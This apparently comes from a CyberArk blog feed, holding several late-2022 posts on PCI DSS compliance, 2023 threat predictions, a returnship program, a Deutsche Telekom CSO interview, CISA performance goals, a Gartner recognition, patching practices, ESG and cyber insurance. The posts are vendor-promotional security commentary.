If your business handles credit or debit card information, now is the time to revisit the Payment Card Industry Data Security Standard (PCI DSS) guidelines to help protect your organization, safeguard customer data, preserve trust and avoid hefty penalty fees.

PCI DSS 4.0 Compliance Goals and Requirements at a Glance

Retailers, processors, service providers and any other businesses that accept major payment cards and store, process and/or transmit cardholder data electronically must follow the PCI DSS guidelines and provide annual evidence of compliance. The global security standard is intended to help protect all parties involved in online transactions against damaging cyberattacks: Cardholders, by safeguarding confidential data, and merchants, by mitigating security vulnerabilities and risk such as unauthorized data access and disclosure.

PCI DSS 4.0 is the latest version published by the Payment Card Industry Security Standards Council, the standard’s governing body. It defines six principal goals and 12 high-level requirements and best practices for securing network and system infrastructure and protecting confidential cardholder data:

As part of these goals, PCI DSS defines strong access control measures and multifactor authentication (MFA) methods to help prevent threat actors from breaching IT systems and stealing confidential cardholder data. Notably, the standard requires merchants to monitor and control access to all administrative accounts on point-of-sales (POS) terminals and any other systems that manage cardholder data.

Addressing Key PCI DSS Requirements with Strong Privileged Access Management Controls

Cybercriminals routinely look for ways to exploit privileged credentials — including those for administrative accounts on IT systems that handle credit card and debit card transactions — to orchestrate attacks and steal sensitive data. Especially during the hectic holiday season, distracted workers, lax credential management practices and error-prone manual security processes provide them with ample opportunity.

Because of this, PCI DSS recommends that merchants consider using a privileged access management (PAM) solution to restrict access to privileged accounts and defend against data breaches. Cloud infrastructure entitlements management (CIEM) solutions similarly help organizations reduce excessive permissions across systems hosting data in their cloud environments — satisfying another key PCI DSS requirement to implement least privilege access.

These controls can provide the foundation of a comprehensive Identity Security approach and the key to satisfying the following PCI DSS requirements:

Privileged access management controls work in concert to improve visibility and control over privileged accounts, isolate and monitor privileged sessions and help to prevent unauthorized access.

By embracing an Identity Security strategy centered on intelligent privileged access management controls, your organization can strengthen its overall security posture and protect confidential data — throughout the busy 2022 holiday season and beyond.

PCI DSS Resources to Help You Get Started

There are many great industry resources available to organizations looking to get up to speed on PCI DSS technical specifications, attestation processes and reporting requirements. Major credit card brands including American Express, Discover, Mastercard and Visa offer free online training programs and support. The PCI Security Standards Council also provides numerous resources on how to keep payment data safe. And to learn how CyberArk helps organizations defend against attacks and improve PCI DSS compliance, check out our latest eBook, “How Privileged Access Management Protects Cardholder Data.”

]]>
2023 Cybersecurity Predictions from CyberArk Labs https://www.cyberark.com/blog/2023-cybersecurity-predictions-from-cyberark-labs/ Mon, 21 Nov 2022 12:44:18 +0000 https://www.cyberark.com/?p=136556

It’s been an eventful 2022 and, based on what our CyberArk Labs team is observing, 2023 will introduce yet another chapter of cybersecurity threats and challenges, along with some new opportunities for vigilant defenders. Here are six of our cybersecurity predictions for the coming year:

1. Web3 on the Blockchain Promises Enhanced Privacy — and Bigger Payouts

Today, more than four out of 10 consumers feel unable to protect their personal data, and many have taken action. This widespread push for greater data transparency and personal control will only grow stronger in 2023, accelerating global momentum for Web3 (aka Web 3.0) on the blockchain. But as technology infrastructure becomes more decentralized, the financial application attack surface will expand significantly, while security practices in this new frontier lag. Threat actors will use this to their advantage to target crypto exchanges and susceptible bridges to the world “off the chain,” drawing inspiration from the $615 million Ronin cryptocurrency heist of 2022.

2. Geopolitical “Winter is Coming,” Along with Increased Attacks on Critical Infrastructure

Our first predicted trend may be exacerbated by the continued conflict in Ukraine, as certain criminal groups ramp up financially motivated attacks and — banking on the promise of massive payouts — shift their gaze in decentralized infrastructure’s direction. Meanwhile, winter is rapidly approaching Eastern Europe, and we can expect attacks on critical infrastructure to spike as temperatures plummet, driving global energy prices up even higher.

3. What’s Old Will Be New Again as Threat Actors Revisit Familiar Tricks

Since Log4j sent shockwaves around the world, speculation on when the other shoe will drop has been constant. But the next “big thing” isn’t likely to be a massive zero day — especially as prices for these coveted vulnerabilities reach upwards of $10 million on darknets and other underground marketplaces, and well-resourced groups and nation-states compete fiercely. Most threat actors will use alternative ways to infiltrate organizations and move laterally toward their targets. And at the end of the day, why would they spend so much cash on a specialized exploit or time contriving new methods when old tricks like phishing, credential theft and social engineering, or one-day kernel-level or memory corruption exploits work just fine?

4. Forget New Year’s Diets — Your Cookies Will Be Too Irresistible

The good news is most organizations no longer view multifactor authentication (MFA) as a “nice to have” for their business applications, meaning most users must input both a username/password combo and complete a secondary authentication challenge before establishing a web session. The bad news is attackers are getting more sophisticated in snagging session cookies — which establish access to these third-party applications — to bypass both primary authentication and MFA and hijack accounts. As organizations continue to adopt more SaaS applications and consolidate them on the browser, session cookies will become even more critical and more vulnerable. With Genesis Store and other marketplaces specializing in stolen session cookies growing in popularity, threat actors will seek ways to further automate and scale these session hijacking attacks to boost profitability next year.

5. A Silver Lining in the Commoditized Credential Age

2023 is the year to begin a career in cybercrime, thanks to the commoditization of the credential. Would-be attackers who lack the skills (or time) can simply browse on a marketplace, fill their carts with cheap lists of stolen credentials and cookies or off-the-shelf ransomware, phishing and exploit kits and check out — no attack legwork required. In this environment, MFA and two-factor authentication won’t be enough. Yet there will be a silver lining for security teams that take a defense in depth approach — one that could swing the pendulum in their favor. Rushing to get rich quick, many cybercriminals will make rookie mistakes or create far too much noise on the network, foiling their plans. For instance, pushing 20 authorization requests in rapid succession as part of an MFA bombing attempt will show up in the victim organization’s logs and raise major red flags.

6. Carbon Credits Will Take Center Stage in Multi-Million-Dollar Schemes

On the heels of the COP27 Climate Conference in Egypt where carbon credits took center stage, opportunistic cyber attackers will increase efforts to manipulate the murky and largely unregulated voluntary carbon market (VCM). While carbon credits continue to grow in popularity with companies and governments working to reduce emissions and offset their own output, we can expect to see more multi-million-dollar schemes to steal and sell emission-trading rights in the next 12 months.

For more content on stolen cookies sessions, register for our Nov. 30, 2022 webinar, “No More Cookies for You: Attacking and Defending Credentials in Chromium-Based Browsers” — presented by Shay Nahari, VP of CyberArk Red Team Services and Andy Thompson, Global Research Evangelist, CyberArk Labs.

]]>
Returnship Programs Normalize Career Breaks – For Everyone’s Benefit https://www.cyberark.com/blog/returnship-programs-normalize-career-breaks-for-everyones-benefit/ Wed, 16 Nov 2022 15:00:46 +0000 https://www.cyberark.com/?p=136502

During the pandemic, four million women — a significantly higher number than men — left the workforce, mostly to take on caretaking duties. While the past few years have emphasized this gender imbalance, “career breaks” are nothing new for many women around the world. When the time comes to re-enter the workforce, they often face challenges.

Explaining the Résumé Gap

Such was the case for Neethu Shenoy, an engineer who paused her career and made an international move to the United States after her daughter was born. Though she was eager to reenter the workforce, pandemic-driven delays extended her career break longer than planned — but that didn’t stop her from developing new skills through online training courses.

Still, the thought of re-entering the workforce was daunting. “Six and a half years is a long time,” Shenoy says. “And staying up to date through education and actual work experience are two very different things. I was nervous and lacked confidence during my job search, not knowing how to navigate through the new world for opportunities.”

Research supports this: The longer women remain out of the workforce, the more difficult it is to return. What’s more, one in three workers experiences a loss in confidence after spending a significant amount of time away from work — with women almost twice as likely to be affected as men.

Systems engineer Alena Tychyna echoes these challenges. “There was a huge gap in my résumé. It was hard for me to even make it to the interview process.” But she didn’t give up, submitting more than 50 job applications and continuing to enhance her technical skills at home.

Both Shenoy’s and Tychyna’s job searches ultimately led them to the CyberArk Returnship Program, a recently launched initiative that helps professionals reconnect with their careers. After participating in an immersive program involving full-time work, coaching and mentorship, both women graduated and were offered permanent positions at CyberArk.

Widening the Cybersecurity Talent Pool

In cybersecurity — an industry plagued by talent shortages — returnship programs can widen the talent pool of experienced workers, and also help attract more women to the profession.

Says CyberArk Chief Human Resources Officer Ruth Shaked, “It’s no secret that sourcing for critical, scarce talent remains a top priority for cybersecurity companies like CyberArk. To successfully execute upon our strategy and goals and to delight our customers with solutions and services that meet their Identity Security requirements, it is essential that we have in place an engaged and motivated workforce. For us, meeting that challenge in the face of the war for talent means embracing creative new ways to attract, retain and develop talent. And what better way could there possibly be than to tap into a market of highly motivated and high-potential candidates?”

Shaked continues, “The CyberArk Returnship Program, devised and introduced by one of our senior technical talent acquisition partners, Sheetal Surendran, does just that. When Sheetal pitched the idea to me that we might consider providing an opportunity for women with a technical background and some previous experience to get back into the workforce — after having taken a break for a variety of personal reasons — I couldn’t have been more enthusiastic.”

Shaked views returnship as a true win/win, calling the CyberArk pilot program an important step in “building diverse and inclusive teams that celebrate a variety of backgrounds, skills and perspectives” and “increasing the percentage of women at CyberArk, especially in technical roles.”

“We’ve found that women resuming their professional careers in technical roles — after opting to stay home for a couple of years with their young children or to pursue an important hobby or interest — possess a level of determination to learn and to excel that is unparalleled,” says Shaked.

A Win/Win for Returners and Employers

Regardless of industry, the benefits of returnship programs are many: Returning professionals can expand their knowledge and skills while easing the transition back to work. Meanwhile, managers have more time to evaluate potential additions to their teams, leading to smarter hiring decisions and stronger retention rates.

Sean Gorman, vice president, cloud operations at CyberArk believes this on-the-job “trial period” is particularly helpful for both parties. “Screening only gets you so far and often doesn’t uncover mismatch in team fit, soft skills or even technical skill gaps,” he notes. “This time allows the company to evaluate the relationship for unexpected challenges, and helps the returner make a fair assessment of the job while immersing themself in the company’s culture.”

Bryan Barnes, director of technical support, Americas at CyberArk, says that returners have brought a welcome infusion of knowledge and capacity to his team. In his experience, professionals who have taken a career break often bring valuable life experiences and perspectives to the table. “We’ve noticed that returners tend to be very patient and driven to succeed in a way that many people are not. A career break allows them to define what they want and pursue it with passion,” says Barnes.

Gorman agrees, noting that the soft skills returners bring — which play a huge role in customer-centric work cultures — cannot be overstated. “Different viewpoints help teams solve issues in creative ways, spark new and interesting invention and bring a more meaningful perspective to day-to-day work life,” says Gorman. “My team has found the level of enthusiasm and engagement to be very high, and that returners seem very open to learning and adapting, whereas workers with a bit more confidence in their recent history may sometimes fall into the ‘yeah, I know that’ trap,” he continues.

Fighting the Stigma

For too long, career breaks and résumé gaps have hindered highly qualified professionals from re-entering the workforce and filling desperately needed cybersecurity and STEM roles.

The good news is that things are starting to change for the better. As one example, LinkedIn introduced a “career break” label in 2022 that allows people to better represent their experiences outside of traditional “work.” This label provides helpful context for potential employers and fosters important dialogue during interviews. And as more companies introduce returnship and return-to-work programs, it is also aiding important recruiting and hiring efforts.

Research clearly shows that when women are empowered to re-join the workforce, everyone benefits. To those women considering a move back to work, Tychyna offers these final words of encouragement: “Don’t feel discouraged and don’t ever give up. Your dream job is waiting for you!”

]]>
Deutsche Telekom CSO on the New Rules of Data Privacy https://www.cyberark.com/blog/deutsche-telekom-cso-on-the-new-rules-of-data-privacy/ Thu, 10 Nov 2022 14:00:20 +0000 https://www.cyberark.com/?p=136412 Deutsche Telekom CSO on the New Rules of Data Privacy

The dramatic uptick in data breaches these last few years, fueled by pandemic-era changes and the rise of remote work, have made consumers even more wary about sharing their data and relinquishing control over their personal information. Increasingly, consumers want to align with businesses that prioritize data privacy and protection and are transparent about how they handle cybersecurity. A PwC global survey found consumers don’t expect perfection when it comes to this effort: Rather, they are seeking clear signs of best practices that include proactively integrating privacy and security into products and services (39%), encrypting all consumer information and company databases (38%) and including security experts in the design of each product (36%). In other words, in today’s modern business era, it’s all about earning customers’ trust.

With that serving as a thematic backdrop, Thomas Tschersich, chief security officer of Deutsche Telekom (the parent company of T-Mobile) and chief technology officer of Telekom Security, recently discussed the new rules of data privacy with me as a guest on the CyberArk Trust Issues podcast. He also shared how the telecommunications giant is reimagining its cybersecurity organization and practices in an embrace of the trust mandate. Here are some excerpts from our discussion, with the entire interview available here:

Q: How are you thinking about approaching data privacy in your role? How is it similar or different from cybersecurity overall?

A: When you compare privacy and security, it’s generally the same, but the motivation is different. Privacy is motivated mainly by a legal perspective for protecting personal information. Cybersecurity is motivated from a risk perspective. The end results are the same; therefore, they fit together perfectly.

The reality is we’re working in a trust business. If we want customers to trust us, we must care about protecting their data. When you can demonstrate that data is in good hands and no one can access it, you establish trust, and the business will grow over time.

Q: What are the unique privacy challenges brought on from the work-from-everywhere era?

A: This is mainly a security challenge — it’s about how to protect data when working in an untrusted environment you can’t control. In the past, we built a fence around our infrastructure, and everything inside the fence was protected. All was good and trustworthy. Then came cloud and distributed services, which introduced a lot of services that need to be trusted but operate outside of the so-called fence. Working from home during the pandemic also meant working outside of that fence.

It’s no longer about building a fence around the infrastructure but about bringing security to identities and to the data itself. It’s now about a Zero Trust approach — don’t trust the underlying infrastructure but protect the data and identities with digital rights management and encryption.

Q: What are the top security considerations when it comes to cellular network infrastructure?

A: It’s not really a question about network infrastructure but more about the usage of such infrastructure … and, for example, how we treat mobile phones. When we talk about protecting mobile phones, it’s typically about a pin number or how to block access. We’re not treating them like computers — there’s no security software on many mobile phones. Yet these phones are idling around the entire day connected to the infrastructure, so they’re a perfect choice for attackers. This is the most underestimated threat, in my view.

Q: Tell us a bit about your company’s Cyber Defense and Security Operations center. What kind of work is going on there?

A: It’s mainly monitoring what happens and modeling threat vectors on a 24/7 basis. There are people working to identify the latest threats and trying to build use cases or detection scenarios. Given the increasing complexity of today’s infrastructure, we need to change to an “assume-breach paradigm” and have the mechanisms in place to detect threats early on. The Cyber Defense Center is the answer using detection, automation and machine learning capabilities.

Q: What is the most challenging aspect of the cybersecurity role?

A: The most challenging part of the role is that security has always been treated as a roadblock. My mission has been to counteract that misperception by changing the behavior of the security organization. We’re not the ones telling others what they can’t do. We’re working very hard on becoming the ones telling others how they can do more things in a secure manner. It’s about transforming the security organization, which was treated as a roadblock, into a helping hand for the business.

Security problems are often of our own making. Take the password, for example. The perfect password typically contains multiple characters, has a certain complexity and has to be changed twice a day. Technically, that constitutes a perfect password. But if you consider the entire process, the result is likely that a user will write the password on a sticky note and keep it on their screen — making it a very weak password because it’s written down. Alternatively, if you only require a six-character password and block the account after the second or third wrong login attempt, you have the same level of security without burdening the customer. You have to see people as customers, not users. That’s the difference in this approach to security, and it results in a different solution. It’s not the perfect technical solution but a more perfect end-to-end solution that matters in the end.

Q: When you hire for such a team, what do you look for?

A: You can spend hours in a job interview talking about technology and someone’s ability to code. For me, however, that doesn’t really matter. You can train people to code. You can train them in technology. What you can’t train them in is attitude. For me, that’s the most important thing. I look for people with the right attitude, with passion and with motivation. That is most valuable factor when choosing people for the team.

For more insights, tune in to the full episode, “Living and Breathing Telecom Trust w/ Thomas Tschersich, CSO of Deutsche Telekom and CTO of Telekom Security,” or listen wherever you get your podcasts.

Editor’s note: This interview has been condensed and edited for length and clarity. 

]]>
CISA CPG Report IDs Top Cybersecurity Steps for SMB Critical Infrastructure Entities https://www.cyberark.com/blog/cisa-cpg-report-ids-top-cybersecurity-steps-for-smb-critical-infrastructure-entities/ Mon, 07 Nov 2022 14:00:27 +0000 https://www.cyberark.com/?p=136309 CISA CPG Report's Cybersecurity Steps for Critical Infrastructure SMBs

The No. 1 cybersecurity challenge across U.S. critical infrastructure is that many organizations haven’t adopted fundamental security controls. Not entirely unsurprising, the finding comes from the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) recently released Cross-Sector Cybersecurity Performance Goals (CPGs) report. Its intent is to establish a uniform baseline of fundamental cybersecurity practices for critical infrastructure entities, particularly small-to-midsize businesses (SMBs) seeking risk-prioritized guidance.

The clock started running on the drafting of the report in July 2021 when the Biden administration issued a National Security Memorandum (NSM) outlining steps to safeguard the country’s critical infrastructure. The memorandum called for CISA, along with the National Institute of Standards and Technology (NIST), to produce clear goals compatible across all critical infrastructure sectors.

CPGs and Adoption: Intended to be Accessible, Voluntary

The 37 individual CPGs are small steps that together have the potential to equate to one giant leap for cybersecurity maturity and consistency across the critical infrastructure sectors. The CISA report does note, “The CPGs do not reflect an all-encompassing cybersecurity program — rather, they are a minimum set of practices that organizations should implement and aim to help CI entities, particularly small and medium organizations, get started on their path towards a strong cybersecurity posture.”

In the report’s opening letter, CISA Director Jen Easterly writes, “Ultimately, our hope is that the CPGs will not only serve as a strong foundation for improving cybersecurity across our nation’s critical infrastructure sectors but also as a baseline of security outcomes that merit the trust of the American people.” That is a giant leap.

According to the report, the CPGs were developed by CISA along with hundreds of public and private sector partners, including federal agencies. Although adoption of the CPGs is voluntary, they serve as an affordable quick-start guide to rapidly improve cybersecurity hygiene.

Guidance for SMBs

The need to develop the CPGs is perhaps felt most by SMBs — organizations that are prone to be strapped by limited resources to prepare for and defend against cyber threats.

The conundrum for these businesses is, of course, which cybersecurity practices and initiatives to prioritize and put resources toward first. Where to start can be daunting and confusing, regardless of whether you’re working with a limited or large budget —and every size in between. Considering identity is the primary mechanism enabling IT operations — and a primary target for attackers — Identity Security controls are emerging as a quick win for organizations with limited resources. That’s why it’s not surprising that “account security” is the first category of the CISA CPGs. It’s like building a house —you’re going to need foundational support before trying to put the roof on. It comes down to fundamentals.

Combining Constructional Forces for Foundational Cybersecurity

The 37 foundational CPGs span eight risk categories, each of which includes four elements: TTP or risk addressed, scope, recommended actions and outcomes. Identity Security controls can help address many of the CPGs, especially in the report’s first category, account security, which includes the following seven CPGs:

According to the report, the initial CPGs are just a start and are not considered to be comprehensive. They will be updated every six to 12 months. The next steps in 2022 include CISA and Sector Risk Management Agencies (SRMAs) combining forces to use the CPGs as a foundation for constructing “sector-specific goals.”

Interested in learning how Identity Security capabilities can help address the CPGs? Schedule a meeting or explore the CyberArk Blueprint, a vendor-agnostic framework for defining a roadmap for Identity Security success.

To learn more, register for our Dec. 7, 2022 webinar, “CyberArk’s Perspective: New CISA Cybersecurity Performance Goals for Critical Infrastructure.”

]]>
Identity Security Calls for Leadership Across Categories https://www.cyberark.com/blog/identity-security-calls-for-leadership-across-categories/ Fri, 04 Nov 2022 15:14:46 +0000 https://www.cyberark.com/?p=136196 CyberArk named a Leader in the new 2022 Gartner Magic Quadrant for Access Management

Albert Einstein once said, “The leader is one who, out of the clutter, brings simplicity … out of discord, harmony … and out of difficulty, opportunity.”

CyberArk is the only Leader in both 2022 Gartner® Magic Quadrant™ Reports for Access Management and Privileged Access Management

Today, it is my honor to share that CyberArk has been named a Leader in the new 2022 Gartner Magic Quadrant for Access Management.1 This closely follows our announcement that CyberArk was also named a Leader in the 2022 Gartner Magic Quadrant for Privileged Access Management2 – for the fourth consecutive time. Gartner evaluated more than 20 vendors across the two reports, and CyberArk is the only company to be named a Leader in both reports. Ever.

Thank you to our customers, partners and employees for helping us achieve this prestigious recognition. We believe this underscores CyberArk’s strategy to develop the industry’s most comprehensive and innovative Identity Security Platform, enabling unparalleled protection for all identities – human and machine – across all devices, in cloud and hybrid environments.

Don’t just manage identities. Secure them.

We live in a digital world with no boundaries – so much so that are 45 machine identities for every human identity, according to CyberArk research. “Privileged users” are no longer just IT admins: We found that 52% of all employee identities have access to sensitive systems and data that attackers can easily exploit. In this environment, every identity at any access point is a gateway to an organization’s most valuable resources.

Security leaders recognize that achieving and maintaining control of every identity is the key to stopping most modern attacks. But they are struggling to implement an identity-first security strategy. Every new digital initiative brings new identity-related challenges and requirements, and new tools are being implemented ad-hoc to address them.

Enterprise security stacks involving multiple vendors and tools have become unwieldy. Teams are juggling multiple solutions – from Identity and Access Management (IAM) to Identity Governance and Administration (IGA) to Privileged Access Management (PAM) – that don’t necessarily integrate with each other, limiting their visibility and control of identities across the enterprise and straining tight resources.

In this landscape, many organizations are seeking to consolidate and simplify security across their complex hybrid and multi-cloud environments.

A recent survey by Gartner, Inc. found that 75% of organizations are pursuing security vendor consolidation in 2022, up from 29% in 2020.3

At CyberArk, we believe consolidation in Identity Security means addressing organizations’ growing requirements with comprehensive capabilities from fewer vendors.

Therefore, Identity Security calls for leadership across categories – it’s not an either/or proposition.

Identity Security: A simplified, comprehensive approach

Centered on intelligent privilege controls, the CyberArk Identity Security Platform seamlessly secures access for all identities and flexibly automates the identity lifecycle, with continuous threat detection and prevention – protecting organization identities and most critical assets. The platform is based on a set of foundational shared services – including AI-powered Identity Security Intelligence – that deliver a unified user experience through a single admin portal and enhance customer value with robust automation and analytics. Through our vast partner network and more than 200 out-of-the-box integrations, CyberArk supports each organization along every step of their Identity Security journey, while helping them maximize existing security investments.

As the Privileged Access Management trailblazer, only CyberArk has the leadership experience, industry expertise and consistent innovation track record to address the broadest range of Identity Security requirements. With a security-first approach grounded in Zero Trust and least privilege, we empower organizations to achieve measurable cyber-risk reduction and meet their strategic business goals.

Leading businesses fearlessly forward

Today’s announcement marks the latest milestone for CyberArk in a momentous 2022. This summer we hosted the world’s largest gathering of Identity Security professionals at our Impact 2022 Boston event. There, we unveiled new platform innovations and advancements in key areas of privileged access management, identity management, cloud privilege security and secrets management to give organizations the confidence they need to accelerate business transformation with less risk. A few months later, we kicked off the CyberArk Impact World Tour to continue sharing our unified Identity Security approach with organizations around the globe.

As we continue to define and lead the Identity Security market, we are innovating rapidly across our CyberArk portfolio. Our Identity Security story is resonating with organizations across industries, who are turning to CyberArk as a trusted partner to secure identities from workforce to privileged users to machines. With a finger on the market pulse and a close eye on the shifting landscape, we continue to invest in strong organic and inorganic growth, and momentum is accelerating for our Identity Security Platform.

Reflecting on this recognition and our accomplishments this year, we again thank our customers, and proudly recognize our employees and partners for their fierce dedication, unwavering integrity and industry-leading innovation.

To learn more, download both complimentary Gartner Magic Quadrant reports here.

For a deeper dive into Identity Security – what it is, how it works and how your organization can benefit – join our CyberArk team for a live webinar on November 16, 2022. Register here to save your spot.

 

Gartner Disclaimers
*Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

1 – Gartner® Magic Quadrant for Access Management, by Henrique Teixeira, Abhyuday Data, Michael Kelley, James Hoover, Brian Guthrie, 1 November 2022

2 – Gartner® Magic Quadrant for Privileged Access Management, by Michael Kelley, James Hoover, Felix Gaehtgens, Abhyuday Data, 19 July 2022

3 – Gartner® Press Release, “Gartner Survey Shows 75% of Organizations Are Pursuing Security Vendor Consolidation in 2022,” 22 September 2022, https://www.gartner.com/en/newsroom/press-releases/2022-09-12-gartner-survey-shows-seventy-five-percent-of-organizations-are-pursuing-security-vendor-consolidation-in-2022

 

]]>
5 Identity Security Considerations for Updating Software https://www.cyberark.com/blog/5-identity-security-considerations-for-updating-software/ Mon, 31 Oct 2022 13:00:40 +0000 https://www.cyberark.com/?p=136041

Updating software is the final cyber-smart behavior promoted by Cybersecurity Awareness Month 2022 organizers – and an important one to emphasize as we close out the month. For IT security teams, updating software to address bugs and security issues has long been a cybersecurity fundamental. But in most enterprise IT environments, updating software isn’t as easy as it sounds.

Last year, threat researchers logged 18,439 common vulnerabilities and exposures (CVEs) in the NIST National Vulnerability Database (NVD) – or more than 50 new flaws per day. With so many vulnerabilities piling up, security teams don’t have the time or resources to make every software update, every time a new vulnerability is disclosed. Instead, risk-based prioritization is the name of the game. And doing this effectively requires a balance between manual effort and automation.

As your security team brushes up on cybersecurity fundamentals this Cybersecurity Awareness Month, here are five best practices to follow for updating software as part of a broader defense-in-depth approach:

1. Prioritize critical patches. Nearly a year ago, the Log4j zero-day vulnerability shook the world. Yet despite headlines and urgent warnings about the vulnerability’s severity, there are still Log4j instances operating in the wild – and still exposed to cyberattacks. It’s important to watch for critical patches for software deployed in your environment and implement them as soon as possible. Review vendor recommendations for all enterprise software platforms in use, along with any underlying OS and enterprise integrations. Treat these recommended procedures as a must. If you can’t, make sure you understand the security implications and build your defenses accordingly.

2. Check in with third-party vendors when critical patches are released. Make sure they’ve also patched the software you use.

3. Continuously monitor software assets. Automating inventory and tracking processes can help your team push software updates in a timely manner, manage end-of-life software, scope access permissions appropriately and make sure weak or default credentials do not remain in use. This is especially important in hybrid and multi-cloud environments where misconfigurations are rampant.

4. Consider connected IoT devices as part of your multi-layered security strategy. IoT devices – from printers and sensors, to cameras and tablets – often have well-known firmware or software vulnerabilities that can be accessed via weak credentials or default credentials that are hardcoded into the device. Finding ways to automatically monitor and secure the credentials used to access these IoT solutions is key to shrinking the attackable surface area.

5. Focus on the bigger issue. Today, credential theft is security leaders’ No. 1 area of risk. There there are countless ways for attackers to steal credentials and exploit identities as a jumping point. Instead of just patching identity-centric vulnerabilities ad hoc, many security teams are working to limit privileged access intelligently through automation to make a greater impact. Examples of this include implementing automated detection controls to find and block credential theft attempts, or placing credential “lures” at points along common attack paths to help trigger red flags when intruders try to move through an environment.

Even if your team had the ability to patch every software or device vulnerability every time, attackers keep innovating. There’s no silver bullet to cybersecurity, which is why assuming breach and layering Identity Security protections with vulnerability assessment, patch management and other critical peripheral defenses is essential for detecting and neutralizing threats faster – before attackers have a chance to cause significant damage.

]]>
CyberArk ESG: Moving Fearlessly and Sustainably Forward https://www.cyberark.com/blog/cyberark-esg-moving-fearlessly-and-sustainably-forward/ Wed, 26 Oct 2022 13:00:38 +0000 https://www.cyberark.com/?p=135952 CyberArk ESG: Moving Fearlessly and Sustainably Forward

As our digital and physical world change rapidly, Environmental, Social and Governance (ESG) is every business’s business. As part of a broader effort to build a more sustainable world, ESG helps us focus our efforts on the key issues that matter to people, demonstrate integrity and build trust, strengthen our communities and help protect our planet.

At CyberArk, the principles of ESG have always been part of our broader strategy and values. Since we formalized our ESG program in 2020, we’ve continued to build and become more transparent on these principles in key focus areas that matter most to our stakeholders and business.

 

Milestones from Our Second Annual ESG Report

As Senior Vice President of Investor Relations and ESG at CyberArk, I am honored to share some milestones in our continued ESG journey. You can learn more about these important initiatives and our work to create a more equitable and sustainable company in our 2022 CyberArk ESG report.

  • Cybersecurity is our business. In our mission to empower customers to move Fearlessly Forward, helping them secure their data is our north star and a clear ESG priority. We have an obligation to uphold the highest standards of security. A few examples of this commitment in action include conducting rigorous internal cybersecurity and data privacy training for approximately 100% of all of our employees, and receiving SOC-2 Type II certification for five of our SaaS solutions.
  • Our people are our greatest asset, and our culture is one of the key ingredients in CyberArk’s success. We achieved an 84% employee satisfaction score — well above industry benchmarks — and were once again recognized as a “Best Place to Work” by Boston Business Journal, reflecting our commitment to creating a community where every voice belongs and feels empowered to be the best version of themselves.

  • Employee well-being and empowerment extend to ongoing learning, career development and management training programs. In 2021, CyberArk employees logged more than 17,000 hours of training — an average of more than eight hours per person.
  • We also took important strides in cultivating a more diverse, equitable and inclusive (DE&I) culture and are particularly excited about launching two new employee resource groups (ERGs). CYBR Women is a global community for the incredible women in Identity Security at CyberArk, strengthened by mentorship and training offered through our “Boost Your Career Program,” which also launched in 2021. And thanks to the amazing work of CYBR Pride ERG champions, our employees say this growing community of LGBTQIA2S+ and ally members supports “a safe space to share experiences” and “promotes diversity.”
  • We believe that bringing more women into the cybersecurity profession, as well as retaining and elevating more women to leadership positions, is essential to addressing widespread talent shortages and driving continued innovation. This belief is reflected in our hiring practices. We increased our percentage of new female hires to 25% in 2021 from 19% in 2019. Thirty-three percent of our management team is female.

We are proud to be ahead of the cybersecurity industry on key diversity initiatives but also know there’s much work to be done. In 2023 and beyond, we will continue to invest in our people, nurture a culture of representation and belonging and help our communities.

  • We are also working to reduce our impact on the environment. Measuring our carbon footprint was an important first step in understanding where we are today. By completing a third-party Scope 1 and Scope 2 greenhouse gas (GHG) emissions analysis, we now have a baseline measurement and are working on a program to reduce our carbon footprint.
  • We know that sustainability requires action — especially when it comes to protecting the world’s forests, which play a critical role in capturing and sequestering carbon and sustaining millions of people. Committed to doing our part, we’ve planted 800 trees and counting as part of our new hire and employee recognition programs. Led by our Green Teams, we’re learning, exploring and enabling initiatives to keep our business environmentally sustainable.

Building ESG Momentum as We Move Forward

ESG is a journey. We’re proud of what we’ve accomplished as a team and are energized by the initiatives we’re tackling today to make a strong impact. It’s also gratifying to see three leading independent ESG ratings agencies give CyberArk high marks for our progress. An “AA” rating  from MSCI ESG Ratings, a “Low Risk” rating from Sustainalytics and a “Prime” rating from ISS ESG position CyberArk as one of the top performers in our industry in managing the most significant ESG risks.

We know that embedding ESG into our decision-making and operating rhythm will only strengthen our ability to move businesses Fearlessly Forward and enhance value for CyberArk employees, customers, partners, investors and others who rely on us.

Data is key to making measurable progress and enhancing transparency. We’re building a strong foundation on which to grow by establishing ESG-related key performance indicators (KPIs), setting goals to hold ourselves accountable and enhancing our governance and compliance processes.

We encourage you to read the full ESG report and value feedback as we move fearlessly and sustainably forward.

 

 

 

]]>
2023 Cyber Insurance Looks Different. Are You Ready? https://www.cyberark.com/blog/2023-cyber-insurance-looks-different-are-you-ready/ Fri, 21 Oct 2022 13:00:20 +0000 https://www.cyberark.com/?p=135823 2023 Cybersecurity Insurance Looks Different. Are You Ready?

Rampant ransomware attacks have made cyber insurance a C-suite priority. Despite the raised consciousness, it’s more difficult than ever to secure or renew a policy. Nefarious activity continues to put pressure on carriers who are responding with even higher premiums and stricter underwriting requirements as they aim to mitigate risks. What was considered acceptable for 2022 may not be considered acceptable for 2023.

The takeaway for companies in the market for cyber insurance is this: Get ready to answer a litany of pre-audit questions and demonstrate a hardened defense strategy.

Top Challenges Shaping Today’s Global Cyber Insurance Market

The growing frequency and sophistication of cyberattacks, especially on the ransomware front, have compelled even more companies to seek coverage. As we’ve previously covered, many cyber insurance providers have reported massive direct-loss ratios for standalone policies. They continue to struggle to adequately cover escalating costs, and things are changing fast. Consider The Marsh & McLennan Cos. Global Insurance Market Index, which found that U.S. cyber insurance prices skyrocketed in the second quarter of 2022, up 79% from a year ago after more than doubling in the two prior quarters.

I spoke about this at the 2022 CyberArk Impact event in Boston alongside CJ Dietzman, CISSP, CISA and managing director and cybersecurity marketplace leader at Marsh Specialty. During our talk he noted, “The ransomware epidemic eviscerated the profitability of cyber insurance. Five to seven years ago, you could fill out a one-page cyber insurance application and answer a handful of questions. Fast forward and the world has changed. Getting insurance with favorable terms, conditions, pricing coverage and low retention is hard right now.”

